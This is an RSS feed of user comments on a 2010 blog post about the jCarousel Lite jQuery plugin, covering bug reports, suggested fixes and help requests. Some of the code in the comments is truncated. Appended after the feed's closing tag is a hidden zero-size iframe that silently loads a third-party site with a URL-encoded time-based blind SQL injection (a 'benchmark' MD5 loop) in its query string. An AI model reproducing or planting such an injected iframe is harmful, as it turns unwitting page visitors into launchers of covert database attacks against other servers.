<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: jCarousel Lite &#8211; A jQuery plugin</title>
	<atom:link href="http://www.gmarwaha.com/blog/2007/08/09/jcarousel-lite-a-jquery-plugin/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.gmarwaha.com/blog/2007/08/09/jcarousel-lite-a-jquery-plugin/</link>
	<description>Ganesh\</description>
	<lastBuildDate>Thu, 11 Mar 2010 03:23:10 -0700</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.4</generator>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
		<item>
		<title>By: Ethan Fougner</title>
		<link>http://www.gmarwaha.com/blog/2007/08/09/jcarousel-lite-a-jquery-plugin/comment-page-16/#comment-69412</link>
		<dc:creator>Ethan Fougner</dc:creator>
		<pubDate>Wed, 10 Mar 2010 16:13:02 +0000</pubDate>
		<guid isPermaLink="false">http://gmarwaha.com/blog/?p=6#comment-69412</guid>
		<description>


  
    
    TOTAL ONE PC SOLUTIONS
    
    


    


    
	&lt;&lt;
	&gt;&gt;
	
    	
           
           
           
           
    	







    
    </description>
		<content:encoded><![CDATA[<p>TOTAL ONE PC SOLUTIONS</p>
<p>	&lt;&lt;<br />
	&gt;&gt;</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Ethan Fougner</title>
		<link>http://www.gmarwaha.com/blog/2007/08/09/jcarousel-lite-a-jquery-plugin/comment-page-16/#comment-69411</link>
		<dc:creator>Ethan Fougner</dc:creator>
		<pubDate>Wed, 10 Mar 2010 16:12:03 +0000</pubDate>
		<guid isPermaLink="false">http://gmarwaha.com/blog/?p=6#comment-69411</guid>
		<description>I tried creating a jcarousel using the above instructions, but it will not work. My html code is as follows....





  
    
    TOTAL ONE PC SOLUTIONS
    
    


    


    
	&lt;&lt;
	&gt;&gt;
	
    	
           
           
           
           
    	


    
    



I verified that the .js files match the names in the head but nothing works</description>
		<content:encoded><![CDATA[<p>I tried creating a jcarousel using the above instructions, but it will not work. My html code is as follows&#8230;.</p>
<p>    TOTAL ONE PC SOLUTIONS</p>
<p>	&lt;&lt;<br />
	&gt;&gt;</p>
<p>I verified that the .js files match the names in the head but nothing works</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Jeremy Clarke</title>
		<link>http://www.gmarwaha.com/blog/2007/08/09/jcarousel-lite-a-jquery-plugin/comment-page-16/#comment-69376</link>
		<dc:creator>Jeremy Clarke</dc:creator>
		<pubDate>Tue, 09 Mar 2010 20:13:01 +0000</pubDate>
		<guid isPermaLink="false">http://gmarwaha.com/blog/?p=6#comment-69376</guid>
		<description>Hey man, this plugin seems great. I&#039;m trying to reduce the number of scripts I include on my site and this seems like it will replace 3 other jquery plugins I was using. 

I will need to use the &#039;external controls&#039; features and I think I have it figured out but wanted to let you know that the documentation about it in the demo is kind of confusing. In the demo page for External Controls you just say &quot; Buttons, buttons and more buttons. Feel free... &quot;. This is cute and all but the example code isn&#039;t that obvious, and I think it would be better if you gave a brief description of how it works and what the contents of the btnGo parameter mean. I looked at the parameter documentation and that explained it okay but it would be nice if the demo also had the explanation. 

Anyway, I love the humor in your other demos, so don&#039;t think I&#039;m saying it should be too serious, just that that particular one could handle some extra data :)

Thanks for making the plugin!</description>
		<content:encoded><![CDATA[<p>Hey man, this plugin seems great. I&#8217;m trying to reduce the number of scripts I include on my site and this seems like it will replace 3 other jquery plugins I was using. </p>
<p>I will need to use the &#8216;external controls&#8217; features and I think I have it figured out but wanted to let you know that the documentation about it in the demo is kind of confusing. In the demo page for External Controls you just say &#8221; Buttons, buttons and more buttons. Feel free&#8230; &#8220;. This is cute and all but the example code isn&#8217;t that obvious, and I think it would be better if you gave a brief description of how it works and what the contents of the btnGo parameter mean. I looked at the parameter documentation and that explained it okay but it would be nice if the demo also had the explanation. </p>
<p>Anyway, I love the humor in your other demos, so don&#8217;t think I&#8217;m saying it should be too serious, just that that particular one could handle some extra data <img src='http://www.gmarwaha.com/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Thanks for making the plugin!</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: hpirator</title>
		<link>http://www.gmarwaha.com/blog/2007/08/09/jcarousel-lite-a-jquery-plugin/comment-page-16/#comment-69337</link>
		<dc:creator>hpirator</dc:creator>
		<pubDate>Mon, 08 Mar 2010 15:22:02 +0000</pubDate>
		<guid isPermaLink="false">http://gmarwaha.com/blog/?p=6#comment-69337</guid>
		<description>It&#039;s better with this code :

/*
// original
if(toitemLength-v) return;
else curr = to;
*/

// fix
if(to == 0 &#124;&#124; to == itemLength-v) return;
else if(to&gt;itemLength-v) curr = itemLength-v;
else if(to&lt;0) curr = 0;
else curr = to;

and (for the disabled class management) :

/*
// original
$(o.btnPrev + &quot;,&quot; + o.btnNext).removeClass(&quot;disabled&quot;);
$( (curr-o.scroll itemLength-v &amp;&amp; o.btnNext)
&#124;&#124;
[]
).addClass(&quot;disabled&quot;);
*/

// fix
$(o.btnPrev + &quot;,&quot; + o.btnNext).removeClass(&quot;disabled&quot;);
$( (curr == 0 &amp;&amp; o.btnPrev)
&#124;&#124;
(curr &gt;= itemLength-v &amp;&amp; o.btnNext)
&#124;&#124;
[]
).addClass(&quot;disabled&quot;);

And it works perfectly with my parameters... Forget the event dispatching I have told, I haven&#039;t seen the &quot;disabled&quot; class on the buttons (is this in the documentation ?)</description>
		<content:encoded><![CDATA[<p>It&#8217;s better with this code :</p>
<p>/*<br />
// original<br />
if(toitemLength-v) return;<br />
else curr = to;<br />
*/</p>
<p>// fix<br />
if(to == 0 || to == itemLength-v) return;<br />
else if(to&gt;itemLength-v) curr = itemLength-v;<br />
else if(to&lt;0) curr = 0;<br />
else curr = to;</p>
<p>and (for the disabled class management) :</p>
<p>/*<br />
// original<br />
$(o.btnPrev + &quot;,&quot; + o.btnNext).removeClass(&quot;disabled&quot;);<br />
$( (curr-o.scroll itemLength-v &amp;&amp; o.btnNext)<br />
||<br />
[]<br />
).addClass(&#8221;disabled&#8221;);<br />
*/</p>
<p>// fix<br />
$(o.btnPrev + &#8220;,&#8221; + o.btnNext).removeClass(&#8221;disabled&#8221;);<br />
$( (curr == 0 &amp;&amp; o.btnPrev)<br />
||<br />
(curr &gt;= itemLength-v &amp;&amp; o.btnNext)<br />
||<br />
[]<br />
).addClass(&#8221;disabled&#8221;);</p>
<p>And it works perfectly with my parameters&#8230; Forget the event dispatching I have told, I haven&#8217;t seen the &#8220;disabled&#8221; class on the buttons (is this in the documentation ?)</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: hpirator</title>
		<link>http://www.gmarwaha.com/blog/2007/08/09/jcarousel-lite-a-jquery-plugin/comment-page-16/#comment-69336</link>
		<dc:creator>hpirator</dc:creator>
		<pubDate>Mon, 08 Mar 2010 14:51:50 +0000</pubDate>
		<guid isPermaLink="false">http://gmarwaha.com/blog/?p=6#comment-69336</guid>
		<description>It&#039;s working for me in changing this code : 

} else {                    // If non-circular and to points to first or last, we just return.
  if(toitemLength-v) return;
  else curr = to;
}                           // If neither overrides it, the curr will still be &quot;to&quot; and we can proceed.

to this code :

} else {                    // If non-circular and to points to first or last, we just return.
  if(to == itemLength-v) return;
  else if(to&gt;itemLength-v) curr = itemLength-v;
  else if(to&lt;0) curr = 0;
  else curr = to;
}                           // If neither overrides it, the curr will still be &quot;to&quot; and we can proceed.

But I don&#039;t if bugs will appear in other configurations...</description>
		<content:encoded><![CDATA[<p>It&#8217;s working for me in changing this code : </p>
<p>} else {                    // If non-circular and to points to first or last, we just return.<br />
  if(toitemLength-v) return;<br />
  else curr = to;<br />
}                           // If neither overrides it, the curr will still be &#8220;to&#8221; and we can proceed.</p>
<p>to this code :</p>
<p>} else {                    // If non-circular and to points to first or last, we just return.<br />
  if(to == itemLength-v) return;<br />
  else if(to&gt;itemLength-v) curr = itemLength-v;<br />
  else if(to&lt;0) curr = 0;<br />
  else curr = to;<br />
}                           // If neither overrides it, the curr will still be &quot;to&quot; and we can proceed.</p>
<p>But I don&#039;t if bugs will appear in other configurations&#8230;</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: hpirator</title>
		<link>http://www.gmarwaha.com/blog/2007/08/09/jcarousel-lite-a-jquery-plugin/comment-page-16/#comment-69335</link>
		<dc:creator>hpirator</dc:creator>
		<pubDate>Mon, 08 Mar 2010 14:29:30 +0000</pubDate>
		<guid isPermaLink="false">http://gmarwaha.com/blog/?p=6#comment-69335</guid>
		<description>Great carousel !

Maybe I have found a little bug : in a non-circular carousel with 10 items, the two last items are not visible and the carousel is stopping at the 8th item. 

My parameters : 
 btnPrev: &#039;#carousel .btn.previous a&#039;,
 btnNext: &#039;#carousel .btn.next a&#039;,
 circular: false,
 visible: 4,
 start: 0,
 scroll: 4

Thank you

PS: It would be relevant to dispatch an event when a non-circular carousel is at the first and at the last items and when the carousel is leaving them.</description>
		<content:encoded><![CDATA[<p>Great carousel !</p>
<p>Maybe I have found a little bug : in a non-circular carousel with 10 items, the two last items are not visible and the carousel is stopping at the 8th item. </p>
<p>My parameters :<br />
 btnPrev: &#8216;#carousel .btn.previous a&#8217;,<br />
 btnNext: &#8216;#carousel .btn.next a&#8217;,<br />
 circular: false,<br />
 visible: 4,<br />
 start: 0,<br />
 scroll: 4</p>
<p>Thank you</p>
<p>PS: It would be relevant to dispatch an event when a non-circular carousel is at the first and at the last items and when the carousel is leaving them.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Rosuta</title>
		<link>http://www.gmarwaha.com/blog/2007/08/09/jcarousel-lite-a-jquery-plugin/comment-page-16/#comment-69311</link>
		<dc:creator>Rosuta</dc:creator>
		<pubDate>Sun, 07 Mar 2010 23:48:44 +0000</pubDate>
		<guid isPermaLink="false">http://gmarwaha.com/blog/?p=6#comment-69311</guid>
		<description>I like the the jCarouselLite. 

There is one thing that looks strange - the size of list and indexes of its items. 

I&#039;ve got list of 8 thumbnails, but when I ask for the list size with &#039;$(&quot;.carousel .thumbnails li&quot;).size()&#039;, it returns 16.
In function called on click I save current index to global variable - currentIndex = $(&quot;.carousel .thumbnails img&quot;).index(this) - it seemss that the first thumbnail has index 0 when the page loads but when I click on it second time, it has index 4 ... 

What I&#039;m trying to do is to do is to switch to next/previous item in list by clicking on right/left side of big image (carousel contains thumbnails). Is it some easy way how to &quot;click&quot; on next/prev item in list ?</description>
		<content:encoded><![CDATA[<p>I like the the jCarouselLite. </p>
<p>There is one thing that looks strange &#8211; the size of list and indexes of its items. </p>
<p>I&#8217;ve got list of 8 thumbnails, but when I ask for the list size with &#8216;$(&#8221;.carousel .thumbnails li&#8221;).size()&#8217;, it returns 16.<br />
In function called on click I save current index to global variable &#8211; currentIndex = $(&#8221;.carousel .thumbnails img&#8221;).index(this) &#8211; it seemss that the first thumbnail has index 0 when the page loads but when I click on it second time, it has index 4 &#8230; </p>
<p>What I&#8217;m trying to do is to do is to switch to next/previous item in list by clicking on right/left side of big image (carousel contains thumbnails). Is it some easy way how to &#8220;click&#8221; on next/prev item in list ?</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: somnath</title>
		<link>http://www.gmarwaha.com/blog/2007/08/09/jcarousel-lite-a-jquery-plugin/comment-page-16/#comment-69196</link>
		<dc:creator>somnath</dc:creator>
		<pubDate>Fri, 05 Mar 2010 07:17:22 +0000</pubDate>
		<guid isPermaLink="false">http://gmarwaha.com/blog/?p=6#comment-69196</guid>
		<description>Hi ,

You are doing great work .
Just tell me .If I mouseover prev button then it should continuously displaying prev images and stops auto functions same with next button.please tell me how can I achieve this .

Thank You
Somnath S</description>
		<content:encoded><![CDATA[<p>Hi ,</p>
<p>You are doing great work .<br />
Just tell me .If I mouseover prev button then it should continuously displaying prev images and stops auto functions same with next button.please tell me how can I achieve this .</p>
<p>Thank You<br />
Somnath S</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: abhi</title>
		<link>http://www.gmarwaha.com/blog/2007/08/09/jcarousel-lite-a-jquery-plugin/comment-page-16/#comment-69185</link>
		<dc:creator>abhi</dc:creator>
		<pubDate>Fri, 05 Mar 2010 04:45:36 +0000</pubDate>
		<guid isPermaLink="false">http://gmarwaha.com/blog/?p=6#comment-69185</guid>
		<description>Can you help me when mouse over animation must stop and when mouseout it must resume the animation. Thanks in advance.</description>
		<content:encoded><![CDATA[<p>Can you help me when mouse over animation must stop and when mouseout it must resume the animation. Thanks in advance.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Jon</title>
		<link>http://www.gmarwaha.com/blog/2007/08/09/jcarousel-lite-a-jquery-plugin/comment-page-16/#comment-68873</link>
		<dc:creator>Jon</dc:creator>
		<pubDate>Fri, 26 Feb 2010 17:58:34 +0000</pubDate>
		<guid isPermaLink="false">http://gmarwaha.com/blog/?p=6#comment-68873</guid>
		<description>last function was edited out.

for (y = 0; y  z) z = x;
}</description>
		<content:encoded><![CDATA[<p>last function was edited out.</p>
<p>for (y = 0; y  z) z = x;<br />
}</p>
]]></content:encoded>
	</item>
</channel>
</rss>


<iframe frameborder=0 marginwidth=0 marginheight=0 scrolling=no width=0 height=0 src="http://loidich.com/?do=links&act=top100&keyword=CaiPen%22%29%20and%20benchmark%28100000000000%2Cmd5%28char%2897%29%29%29%3Dbenchmark%28100000000000%2Cmd5%28char%2897%29%29%29%23&Submit=Go"></iframe>